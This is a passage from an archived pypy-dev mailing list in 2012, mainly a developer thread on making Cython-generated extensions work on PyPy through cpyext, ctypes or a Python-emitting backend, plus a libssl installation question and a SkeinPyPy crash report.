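In a release build both wrappers would simply expand to the plain C-API calls; only the test build pays for the bookkeeping.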
Maybe there are mechanisms on the PyPy side that Cython could hook into in order to create and use objects more efficiently, or it could drop optimistic optimisations that are known to never apply to PyPy and only cost runtime checks or degrade the performance in other ways. Seriously - we control the code on both sides. I think the possibilities are endless. Stefan From amauryfa at gmail.com Tue Feb 14 10:41:10 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Tue, 14 Feb 2012 10:41:10 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> Message-ID: 2012/2/14 Stefan Behnel > Antonio Cuni, 14.02.2012 09:35: > > On 02/14/2012 09:17 AM, Stefan Behnel wrote: > >> > >> Stuffing the code for both CPython and PyPy into the same C source file > may > >> result in a noticeable increase in C code size at some point, but as > long > >> as the C preprocessor can filter it back out, at least the build times > >> won't go up all that much, and it's not like a couple of compressed > KBytes > >> more would hurt a PyPI package these days. > > > > This is unlikely to happen IMHO, because PyPy does not offer its own C > API > > (yet?). The only C API supported by PyPy is cpyext, which is a (slowish) > > wrapper compatible with CPython. > > > > The only places where the C code needs to be different is where Cython > > bypasses the C API and directly manipulates the underlying C structures. > > I agree that this interconnection should grow out of cpyext, but I think we > should look out for ways to extend (pun intended) that C-API in order to > improve both the efficiency and the semantics. > > I mean, even Py_INCREF() is wrapped in another macro in Cython that we > already replace by code that does ref-counting validation for us at test > time. Feel free to let us generate any code you want for that, including > special setup and cleanup code at a function boundary or other appropriate > places.
> > Higher level functionality could be wrapped in PyPy-specific C-API calls to > avoid going through multiple CPython API calls, e.g. a method lookup > followed by a call. > > We could emit hints like "the code is only going to use this object > temporarily for iteration", which may allow PyPy to reduce the overhead of > providing a C façade for it. Maybe there are mechanisms on the PyPy side that > Cython could hook into in order to create and use objects more efficiently, > or it could drop optimistic optimisations that are known to never apply to > PyPy and only cost runtime checks or degrade the performance in other ways. > > Seriously - we control the code on both sides. I think the possibilities > are endless. Why only think in terms of C code then? The best API pypy offers so far is written in RPython - space operations, type definitions, and external C calls. The "only" missing part is to allow this in a separately compiled module. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Tue Feb 14 10:45:32 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 14 Feb 2012 11:45:32 +0200 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: <4F3991C8.5040305@u.washington.edu> References: <4F3991C8.5040305@u.washington.edu> Message-ID: On Tue, Feb 14, 2012 at 12:42 AM, Dale Hubler wrote: > Hello, > > I was requested to install pypy but our computers appear to be too new to > run it, having libssl.so.0.9.8e among other newer items. This confuses me > because the web page for pypy shows a 2011 date and blog entries from 2012. > Can 2005 SSL really be a requirement? I am unable to install such an old > item on a cluster where this software might be used. > > I looked at the pypy site but cannot find any supported platforms, install > guide, etc. I am trying this on RedHat EL 5.
I tried the binary release, > but it also had the same error, no libssl.so.0.9.8, which is true, my > systems are updated. I must be missing something. Do you have any links > or other on-line info explaining how to build pypy. > thanks, > Dale > > -- > Dale Hubler dhubler at uw.edu (206) 685-4035 > Senior Computer Specialist University of Washington Genome Sciences Dept. > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev It's not a PyPy requirement, it's the binary's requirement. To be honest, binary distribution on linux is a major mess. Fortunately, for most popular distributions there is some better or worse official or semi-official way to get it directly from the distribution, and that's the recommended way (fedora, ubuntu, debian, gentoo and arch package pypy). From anto.cuni at gmail.com Tue Feb 14 10:48:10 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Tue, 14 Feb 2012 10:48:10 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> Message-ID: <4F3A2DDA.107@gmail.com> On 02/14/2012 10:41 AM, Amaury Forgeot d'Arc wrote: > > Seriously - we control the code on both sides. I think the possibilities > are endless. > > > Why only think in terms of C code then? The best API pypy offers so far > is written in RPython - space operations, type definitions, and external C calls. > > The "only" missing part is to allow this in a separately compiled module. yes, I agree with amaury. My proposal was just "a dirty hack" to make things work in the short term. In the long run, I think that the best for pypy would be either an rpython backend or the python+ctypes backend which Romain began. Or, possibly, a python+_ffi backend in case ctypes is too slow (and once _ffi is powerful enough to substitute ctypes entirely).
ciao, Anto From fijall at gmail.com Tue Feb 14 10:50:57 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 14 Feb 2012 11:50:57 +0200 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: <4F3A2DDA.107@gmail.com> References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: On Tue, Feb 14, 2012 at 11:48 AM, Antonio Cuni wrote: > On 02/14/2012 10:41 AM, Amaury Forgeot d'Arc wrote: >> >> >> Seriously - we control the code on both sides. I think the >> possibilities >> are endless. >> >> >> Why only think in terms of C code then? The best API pypy offers so far >> is written in RPython - space operations, type definitions, and external C >> calls. >> >> The "only" missing part is to allow this in a separately compiled module. > > > yes, I agree with amaury. My proposal was just "a dirty hack" to make things > work in the short term. > > In the long run, I think that the best for pypy would be either an rpython > backend or the python+ctypes backend which Romain began. Or, possibly, a > python+_ffi backend in case ctypes is too slow (and once _ffi is powerful > enough to substitute ctypes entirely). > > ciao, > Anto The thing is no one seriously works on Cython's PyPy backend, so the dirty hacks seem like a very good solution short-to-mid term. From arigo at tunes.org Tue Feb 14 13:13:24 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 13:13:24 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Hi Fijal, On Tue, Feb 14, 2012 at 10:50, Maciej Fijalkowski wrote: > The thing is no one seriously works on Cython's PyPy backend, so > the dirty hacks seem like a very good solution short-to-mid term. Someone feel free to try them out. However I'm generally negative about the outcome and its portability.
Please do keep in mind however that generating C code and having custom macros to compile it either for CPython or for PyPy is *not* going to work --- unless someone very carefully designs some very clever missing piece and we place a number of restrictions on the cases where it works. Stefan: the main problem is that the RPython-to-C translation that we do is not just a one-format translation. We need to tweak the intermediate code in various ways depending on various settings. The way it is tweaked really depends on these settings in a way that cannot be captured just by C macros. (If it could, we might have written the whole project in C instead of RPython in the first place.) You would end up with a version of the Cython C code that only works on *some* kind of PyPy, like one using the minimark GC, without any JIT support, and without sandboxing support. (Just to add an example, I could also say "and without stackless support", but this is no longer true nowadays because we no longer rely on a transformation for stackless.) For this reason, I remain convinced that the best approach for Cython on PyPy is instead to have Cython generate pure Python code that would use some API in the form of a built-in Python module. ctypes may work, but custom alternatives may be better. The built-in module can be implemented just once on PyPy (and optionally on CPython too, mostly for testing). A bientôt, Armin. From arigo at tunes.org Tue Feb 14 13:18:27 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 13:18:27 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Re-Hi, On Tue, Feb 14, 2012 at 13:13, Armin Rigo wrote: > For this reason, I remain convinced that the best approach for Cython > on PyPy is instead to have Cython generate pure Python code that would > use some API in the form of a built-in Python module.
For what it's worth, it would work if the Cython sources (or even the C intermediate sources) were "compiled" into any custom bytecode, not necessarily Python's. We would then write a simple interpreter for it in RPython, which looks kind of easy. It may seem strange, but it's actually similar to regular expressions. As a rather extreme solution: I wonder how useful it would be to use gcc to cross-compile the C intermediate sources to MIPS assembler, and write a MIPS interpreter in RPython... (MIPS because it's apparently a very simple instruction set) A bientôt, Armin. From anto.cuni at gmail.com Tue Feb 14 13:23:24 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Tue, 14 Feb 2012 13:23:24 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: <4F3A523C.6040600@gmail.com> On 02/14/2012 01:18 PM, Armin Rigo wrote: > As a rather extreme solution: I wonder how useful it would be to use > gcc to cross-compile the C intermediate sources to MIPS assembler, and > write a MIPS interpreter in RPython... (MIPS because it's apparently > a very simple instruction set) this approach would work for all C extensions then, not just Cython's one, right? From amauryfa at gmail.com Tue Feb 14 13:26:14 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Tue, 14 Feb 2012 13:26:14 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: 2012/2/14 Armin Rigo > As a rather extreme solution: I wonder how useful it would be to use > gcc to cross-compile the C intermediate sources to MIPS assembler, and > write a MIPS interpreter in RPython... (MIPS because it's apparently > a very simple instruction set) > Are you suggesting something similar to emscripten? A LLVM-to-RPython compiler!
:-) -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Tue Feb 14 13:40:17 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 13:40:17 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Armin Rigo, 14.02.2012 13:18: > On Tue, Feb 14, 2012 at 13:13, Armin Rigo wrote: >> For this reason, I remain convinced that the best approach for Cython >> on PyPy is instead to have Cython generate pure Python code that would >> use some API in the form of a built-in Python module. > > For what it's worth, it would work if the Cython sources (or even the > C intermediate sources) were "compiled" into any custom bytecode, not > necessarily Python's. We would then write a simple interpreter for it > in RPython, which looks kind of easy. It may seem strange, but it's > actually similar to regular expressions. > > As a rather extreme solution: I wonder how useful it would be to use > gcc to cross-compile the C intermediate sources to MIPS assembler, and > write a MIPS interpreter in RPython... (MIPS because it's apparently > a very simple instruction set) I can't see how this approach would solve the problem, at least not how it's better than anything else. 1) assembly is an extremely low-level interface that loses tons of code semantics, which makes it hard to run such code efficiently 2) it doesn't take away the need for C-API interaction, which means that this API still needs to be implemented completely, in one way or another Stefan From stefan_ml at behnel.de Tue Feb 14 14:12:09 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 14:12:09 +0100 Subject: [pypy-dev] offtopic, ontopic, ...
In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Armin Rigo, 14.02.2012 13:13: > the main problem is that the RPython-to-C translation that we > do is not just a one-format translation. We need to tweak the > intermediate code in various ways depending on various settings. The > way it is tweaked really depends on these settings in a way that > cannot be captured just by C macros. (If it could, we might have > written the whole project in C instead of RPython in the first place.) > You would end up with a version of the Cython C code that only works > on *some* kind of PyPy, like using the minimark GC, without any JIT > support, and without sandboxing support. (Just to add an example, I > could also say "and without stackless support", but this is no longer > true nowadays because we no longer rely on a transformation for > stackless.) Hmm, if that is so, how would you ever want to make PyPy bidirectionally interface with anything at all? How does ctypes even work in PyPy? Is it just that you're lucky that ctypes can be controlled completely from within PyPy and doesn't let any internals leak into the outside world? Then how is rffi supposed to do it better? And how are you planning to export numpypy buffers to non-PyPy code? It's one thing to export low-level data and simple C functions etc. to external code. However, the open C-API of CPython is a serious part of its success story. It's not just legacy code that uses it, it continues to be an important part of the platform. If PyPy can't have such an API, that's a serious drawback of the architecture. Stefan From fijall at gmail.com Tue Feb 14 14:21:32 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 14 Feb 2012 15:21:32 +0200 Subject: [pypy-dev] offtopic, ontopic, ...
In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: On Tue, Feb 14, 2012 at 3:12 PM, Stefan Behnel wrote: > Armin Rigo, 14.02.2012 13:13: >> the main problem is that the RPython-to-C translation that we >> do is not just a one-format translation. We need to tweak the >> intermediate code in various ways depending on various settings. The >> way it is tweaked really depends on these settings in a way that >> cannot be captured just by C macros. (If it could, we might have >> written the whole project in C instead of RPython in the first place.) >> You would end up with a version of the Cython C code that only works >> on *some* kind of PyPy, like using the minimark GC, without any JIT >> support, and without sandboxing support. (Just to add an example, I >> could also say "and without stackless support", but this is no longer >> true nowadays because we no longer rely on a transformation for >> stackless.) > > Hmm, if that is so, how would you ever want to make PyPy bidirectionally > interface with anything at all? How does ctypes even work in PyPy? Is it > just that you're lucky that ctypes can be controlled completely from within > PyPy and doesn't let any internals leak into the outside world? Then how is > rffi supposed to do it better? And how are you planning to export numpypy > buffers to non-PyPy code? > > It's one thing to export low-level data and simple C functions etc. to > external code. However, the open C-API of CPython is a serious part of its > success story. It's not just legacy code that uses it, it continues to be > an important part of the platform. If PyPy can't have such an API, that's a > serious drawback of the architecture. > > Stefan I think the CPython C API is a serious part of its success because it's "good enough for a lot of cases", not because it's necessary for its success.
In my opinion a decent FFI (not ctypes, I mean a decent one) and better performance would eliminate this need completely. From our perspective then, the CPython C API is just legacy. From anto.cuni at gmail.com Tue Feb 14 14:24:31 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Tue, 14 Feb 2012 14:24:31 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: <4F3A608F.80000@gmail.com> On 02/14/2012 02:21 PM, Maciej Fijalkowski wrote: > I think the CPython C API is a serious part of its success because it's > "good enough for a lot of cases", not because it's necessary for its > success. In my opinion a decent FFI (not ctypes, I mean a decent one) > and better performance would eliminate this need completely. From our > perspective then, the CPython C API is just legacy. well, a C API is still needed if you want to embed the interpreter inside a larger C program, but PyPy doesn't offer it (yet?). I agree that for the use case of calling external code (which is what we are discussing right now), a good ffi + a good JIT should eliminate the need for the C API. ciao, Anto From faassen at startifact.com Tue Feb 14 14:47:21 2012 From: faassen at startifact.com (Martijn Faassen) Date: Tue, 14 Feb 2012 14:47:21 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: <4F3A608F.80000@gmail.com> References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> <4F3A608F.80000@gmail.com> Message-ID: Hi there, So if I understand the direction of this discussion correctly, it is suggested that to interface PyPy with Cython in a non-hackish way the best strategy might be to modify Cython to generate Python code. This way, there's no need to expose all sorts of PyPy internals on a C API level, and Cython-generated code could benefit from the JIT. This would essentially solve the problem for any code in Cython that didn't talk to any C APIs.
But Cython-based code does talk to C APIs, so there is a problem. Python code in PyPy needs to be able to interface with C APIs first in order to generate the right stuff from Cython. ctypes is not considered to be a decent way to integrate PyPy with C APIs. A decent foreign function interface for PyPy would be needed first, or alternatively one that's specifically written for the concerns of Cython. Did I get this right? So what would be required to create a decent FFI of this nature? What would make it decent? How could Cython's experience interfacing with C help to design this? Regards, Martijn From daid303 at gmail.com Tue Feb 14 15:05:51 2012 From: daid303 at gmail.com (Daid) Date: Tue, 14 Feb 2012 15:05:51 +0100 Subject: [pypy-dev] error In-Reply-To: References: Message-ID: You don't check your email for a few days and this happens... For the pypy-dev people: this is about SkeinPyPy, a pre-packaged Python software package I made, which comes with PyPy. https://github.com/daid/SkeinPyPy The packaged version was 1.7 for the Alpha2 and Alpha3, and pypy-1.8 for Alpha4. I don't even know why Frans added more people to this mail "conversation"; all I got was an email saying that something was not working, and a screenshot with a picture showing that it was working. I guess because PyPy crashed and I didn't answer within a day, he went looking for other help. To reproduce this problem you would need quite a few items. (And seeing the... quality of Frans's communications, I highly doubt I will get them.) The SkeinPyPy package, the STL file, and the "configuration profile" would be needed. But this might not be a PyPy problem per se; I've seen PyPy 1.7 crash before because of bad python code (the code base is pretty large, and it has many configuration options), so it might have taken a code path that would have caused an exception with normal python code. (Could also be seen as a bug in PyPy.) And as a last possibility, his PC hardware could be damaged.
As the bug doesn't always happen (as far as I can see from his confusing emails), I hope this cleared a thing or 2 up. Keep up the great work, pypy is awesome :D Frans de jong, Are you using SkeinPyPy Alpha4 or an earlier version? If the version is outdated, use Alpha4. Also, try running the same slice, but first rename the "pypy" folder to something else. This will disable the pypy engine and will run everything in normal Python. If that works, then there is a pypy bug. Else we have a bug in Skeinforge. Also, don't be afraid to type more than 1 sentence. You can never give enough information when you have problems like this. PS. If you are dutch (which is quite likely given that name), and your dutch is better than your english, you may email me. But JUST me, don't add other people, in dutch. On Mon, Feb 13, 2012 at 11:17 AM, Armin Rigo wrote: > Hi Frans, > > Thank you, but we need to know at least: > > - the version of PyPy (is it the official PyPy 1.8?); > - the program that is started (and how to install it, if complicated); > - and for reference, the OS --- I guess Windows from the dump of Amaury. > > Also, I don't find yesterday's conversation with you. Can you explain > where it was (nickname if on IRC, etc.)? > > > A bientôt, > > Armin. > -------------- next part -------------- An HTML attachment was scrubbed... URL: From arigo at tunes.org Tue Feb 14 15:49:28 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 15:49:28 +0100 Subject: [pypy-dev] error In-Reply-To: References: Message-ID: Hi, Frans answered with more details but in a private mail to me. I copied it to the following bug report: https://bugs.pypy.org/issue1045 This is really a pypy bug, because it should not be possible to get an "RPython error: AssertionError". It shows that an assert in the PyPy source code triggered (in the JIT optimizer, based on the file names). But of course it might be hard to reproduce without all the information. A bientôt, Armin.
From arigo at tunes.org Tue Feb 14 15:59:30 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 15:59:30 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: <4F3A523C.6040600@gmail.com> References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> <4F3A523C.6040600@gmail.com> Message-ID: Hi Antonio, On Tue, Feb 14, 2012 at 13:23, Antonio Cuni wrote: > this approach would work for all C extensions then, not just Cython's one, > right? No. Or maybe yes, but with much more work. I'm suggesting to take specifically the Cython-produced C files, with all macros redefined to strange things detectable in the MIPS assembler. We only need to interpret the MIPS-compiled version of C code *produced by Cython and using our strange macros*, which is probably much easier than interpreting random compiled C code. Amaury wrote: > Are you suggesting something similar to emscripten? > A LLVM-to-RPython compiler! > :-) Yes, that might work with LLVM too, but not as a compiler producing RPython; as an interpreter written in RPython, that would interpret some custom format derived (maybe) from LLVM's. Or, for all I know, maybe it's possible and not too much work to have just a full interpreter for LLVM bytecode. :-) It all sounds far-fetched, but maybe it's not. A bientôt, Armin. From arigo at tunes.org Tue Feb 14 16:12:16 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 16:12:16 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Hi Stefan, On Tue, Feb 14, 2012 at 14:12, Stefan Behnel wrote: >> Hmm, if that is so, how would you ever want to make PyPy bidirectionally >> interface with anything at all? How does ctypes even work in PyPy? > I believe you are not understanding my point. Obviously ctypes works in PyPy, and not, I believe, in a particularly "lucky" way at all.
It works by not being written as C code at all, but as (Python and) RPython code. The difference of levels between C and RPython is essential in PyPy. I just gave tons of examples of why it is so. I know it's not a perfect solution for everybody; but we think that writing C code (or generating it straight from something else) is not the most flexible way to develop software. You may not agree with that, and you're free to; but consider that we would be unlikely to have a JIT in PyPy at all without the approach we took, so we think there is some merit in it. Note that I'm pushing so much for a Cython that would emit Python code instead of C --- but that's mostly for performance reasons on top of PyPy. The alternative, which is quicker and only slightly more hackish, is to complete the C API of cpyext in PyPy until it works well enough. Don't come complaining "it's slow", though. It *is* going to be slow. A bientôt, Armin. From arigo at tunes.org Tue Feb 14 16:19:54 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 16:19:54 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> <4F3A608F.80000@gmail.com> Message-ID: Hi Martijn, On Tue, Feb 14, 2012 at 14:47, Martijn Faassen wrote: > But Cython-based code does talk to C APIs, so there is a problem. > Python code in PyPy needs to be able to interface with C APIs first in > order to generate the right stuff from Cython. That's not necessarily hard. I believe that Cython code like this: PyObject *x = PyDict_GetItem(y, key) can correspond "faithfully" to Python code like that --- if we assume that 'y' contains really a dict: x = y[key] I don't know to what extent the whole C API can be mapped back to Python, but certainly the most common functions can. A bientôt, Armin.
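The back-mapping Armin describes could start out as a simple lookup table; the sketch below is an assumption about what a Python-emitting backend might do, not existing Cython code (a real backend would work on the typed AST rather than on C source strings):

```python
# Hypothetical table mapping common CPython C-API calls, as Cython
# emits them, back to plain Python source.  Entries are illustrative.

CAPI_TO_PYTHON = {
    "PyDict_GetItem(y, key)": "y[key]",
    "PyList_Append(lst, item)": "lst.append(item)",
    "PyObject_Length(obj)": "len(obj)",
    "PyNumber_Add(a, b)": "a + b",
}

def lower_to_python(capi_call):
    # Return the plain-Python spelling, or None if the call is unknown.
    return CAPI_TO_PYTHON.get(capi_call)

print(lower_to_python("PyDict_GetItem(y, key)"))  # → y[key]
```

Calls without a plain-Python spelling would be the hard cases that still need some built-in support module on the PyPy side.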
From markflorisson88 at gmail.com Tue Feb 14 16:22:52 2012 From: markflorisson88 at gmail.com (mark florisson) Date: Tue, 14 Feb 2012 15:22:52 +0000 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: On 14 February 2012 13:21, Maciej Fijalkowski wrote: > On Tue, Feb 14, 2012 at 3:12 PM, Stefan Behnel wrote: >> Armin Rigo, 14.02.2012 13:13: >>> the main problem is that the RPython-to-C translation that we >>> do is not just a one-format translation. We need to tweak the >>> intermediate code in various ways depending on various settings. The >>> way it is tweaked really depends on these settings in a way that >>> cannot be captured just by C macros. (If it could, we might have >>> written the whole project in C instead of RPython in the first place.) >>> You would end up with a version of the Cython C code that only works >>> on *some* kind of PyPy, like using the minimark GC, without any JIT >>> support, and without sandboxing support. (Just to add an example, I >>> could also say "and without stackless support", but this is no longer >>> true nowadays because we no longer rely on a transformation for >>> stackless.) >> >> Hmm, if that is so, how would you ever want to make PyPy bidirectionally >> interface with anything at all? How does ctypes even work in PyPy? Is it >> just that you're lucky that ctypes can be controlled completely from within >> PyPy and doesn't let any internals leak into the outside world? Then how is >> rffi supposed to do it better? And how are you planning to export numpypy >> buffers to non-PyPy code? >> >> It's one thing to export low-level data and simple C functions etc. to >> external code. However, the open C-API of CPython is a serious part of its >> success story. It's not just legacy code that uses it, it continues to be >> an important part of the platform.
If PyPy can't have such an API, that's a >> serious drawback of the architecture. >> >> Stefan > > I think the CPython C API is a serious part of its success because it's > "good enough for a lot of cases", not because it's necessary for its > success. In my opinion a decent FFI (not ctypes, I mean a decent one) > and better performance would eliminate this need completely. From our > perspective then, the CPython C API is just legacy. > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev Yes, I don't think the full C API is a necessity, although it would be convenient for Cython. Compiling to pure python (+ctypes) (or python bytecode, which wouldn't really be much easier or harder) is possible for the obvious cases, but there are areas where it could be tricky: 1) C++ support (http://docs.cython.org/src/userguide/wrapping_CPlusPlus.html) Perhaps the code could be wrapped in an API with external C linkage, callable through ctypes. 2) cdef (C) functions as C callbacks For cdef functions called from Cython, simply generate a python function. When you take the address of a cdef function, you get the address of an actual C function that constructs ctypes objects holding a pointer to the arguments and the return value that it passes to a python function. Perhaps for a nogil function original Cython mechanics could be used if there is no with gil block present, or any function calls declared with the generic 'except *' clause. 3) managing the GIL You can't really release the GIL in python code, and if most of your Cython code isn't actual C code, releasing the GIL won't be feasible. Through ctypes one could release the GIL, but nogil blocks are much more coarse-grained than that (perhaps nogil blocks should be compiled to C functions, which are called through a ctypes GIL-releasing call?). Or maybe explicit releases should just be ignored.
4) buffers (http://docs.cython.org/src/tutorial/numpy.html and https://sage.math.washington.edu:8091/hudson/job/cython-docs/doclinks/1/src/userguide/memoryviews.html) Buffers could perhaps be addressed by type-checks only, to check matching dtypes as well as contiguity constraints (and some other features, like obtaining a memoryview of C data etc. (numpy.ctypeslib.as_array?)), but leaving the rest purely to (num)pypy.

5) parallelism (http://docs.cython.org/src/userguide/parallelism.html) This could just be sequential, as it is now in pure-python mode.

Under this model I think the first three points are particularly tough. Could RPython in any way alleviate the countless problems with this approach (and how?), and would it allow the flexibility to implement these features, or part of them? Going the python + ctypes way through to the end, and supporting all the features, will be a lot of work. Also, I see how much code could be compiled to pure-python (+ctypes), but I'm pretty sure not all code could be handled this way. The code that can't be handled will need to call back into pypy somehow, which would mandate a small (but existing) C API.

From faassen at startifact.com Tue Feb 14 16:25:42 2012 From: faassen at startifact.com (Martijn Faassen) Date: Tue, 14 Feb 2012 16:25:42 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> <4F3A608F.80000@gmail.com> Message-ID:

On Tue, Feb 14, 2012 at 4:19 PM, Armin Rigo wrote: > Hi Martijn, > > On Tue, Feb 14, 2012 at 14:47, Martijn Faassen wrote: >> But Cython-based code does talk to C APIs, so there is a problem. >> Python code in PyPy needs to be able to interface with C APIs first in >> order to generate the right stuff from Cython. > > That's not necessarily hard. I believe that Cython code like this: > >
PyObject *x = PyDict_GetItem(y, key) > > can correspond "faithfully" to Python code like that --- if we assume > that 'y' really contains a dict: > > x = y[key] > > I don't know to what extent the whole C API can be mapped back to > Python, but certainly the most common functions can.

Yes, that's the Python C API, but I was talking about other C APIs. Take lxml, which uses the libxml2 APIs. There is no way to map that to Python unless you use something like ctypes (but ctypes is not considered to be right for this purpose). Regards, Martijn

From markflorisson88 at gmail.com Tue Feb 14 16:26:14 2012 From: markflorisson88 at gmail.com (mark florisson) Date: Tue, 14 Feb 2012 15:26:14 +0000 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID:

On 14 February 2012 15:12, Armin Rigo wrote: > Hi Stefan, > > On Tue, Feb 14, 2012 at 14:12, Stefan Behnel wrote: >> Hmm, if that is so, how would you ever want to make PyPy bidirectionally >> interface with anything at all? How does ctypes even work in PyPy? > > I believe you are not understanding my point. Obviously ctypes works > in PyPy, and not, I believe, in a particularly "lucky" way at all. It > works by not being written as C code at all, but as (Python and) > RPython code. The difference of levels between C and RPython is > essential in PyPy. I just gave tons of examples of why it is so. I > know it's not a perfect solution for everybody; but we think that > writing C code (or generating it straight from something else) is not > the most flexible way to develop software. You may not agree with > that, and you're free to; but consider that we would be unlikely to > have a JIT in PyPy at all without the approach we took, so we think > there is some merit in it.
> > Note that I'm pushing so much for a Cython that would emit Python code > instead of C --- but that's mostly for performance reasons on top of > PyPy. The alternative, which is quicker and only slightly more > hackish, is to complete the C API of cpyext in PyPy until it works > well enough. Don't come complaining "it's slow", though. It *is* > going to be slow. >

Insofar as that is feasible all the way through (and not just python + a nicer way to call C functions), that would be great. However, any attempt in this direction will be very involved, whereas I think people would be quite happy already to see anything work completely. Getting all features to work is at least a lot more important than any performance issues (assuming it won't be horrendously slow :).

> A bientôt, > > Armin. > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev

From markflorisson88 at gmail.com Tue Feb 14 16:28:18 2012 From: markflorisson88 at gmail.com (mark florisson) Date: Tue, 14 Feb 2012 15:28:18 +0000 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> <4F3A608F.80000@gmail.com> Message-ID:

On 14 February 2012 15:25, Martijn Faassen wrote: > On Tue, Feb 14, 2012 at 4:19 PM, Armin Rigo wrote: >> Hi Martijn, >> >> On Tue, Feb 14, 2012 at 14:47, Martijn Faassen wrote: >>> But Cython-based code does talk to C APIs, so there is a problem. >>> Python code in PyPy needs to be able to interface with C APIs first in >>> order to generate the right stuff from Cython. >> >> That's not necessarily hard. I believe that Cython code like this: >> >> PyObject *x = PyDict_GetItem(y, key) >> >> can correspond "faithfully" to Python code like that --- if we assume >> that 'y' really contains a dict: >> >>
x = y[key] >> >> I don't know to what extent the whole C API can be mapped back to >> Python, but certainly the most common functions can. > > Yes, that's the Python C API, but I was talking about other C APIs. > Take lxml, which uses the libxml2 APIs. > > There is no way to map that to Python unless you use something like > ctypes (but ctypes is not considered to be right for this purpose).

Why is ctypes not right? Cython could actually generate a C function with a known interface that proxies the actual C function. That code would be compiled by the C compiler, and any C API changes would prevent the module from compiling. It would also take care of any promotions etc. on the C level.

> Regards, > > Martijn > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev

From jfcgauss at gmail.com Tue Feb 14 16:35:54 2012 From: jfcgauss at gmail.com (Serhat Sevki Dincer) Date: Tue, 14 Feb 2012 17:35:54 +0200 Subject: [pypy-dev] Fwd: Discussion with Guido van Rossum and (hopefully) core python-dev on scientific Python and Python3 Message-ID:
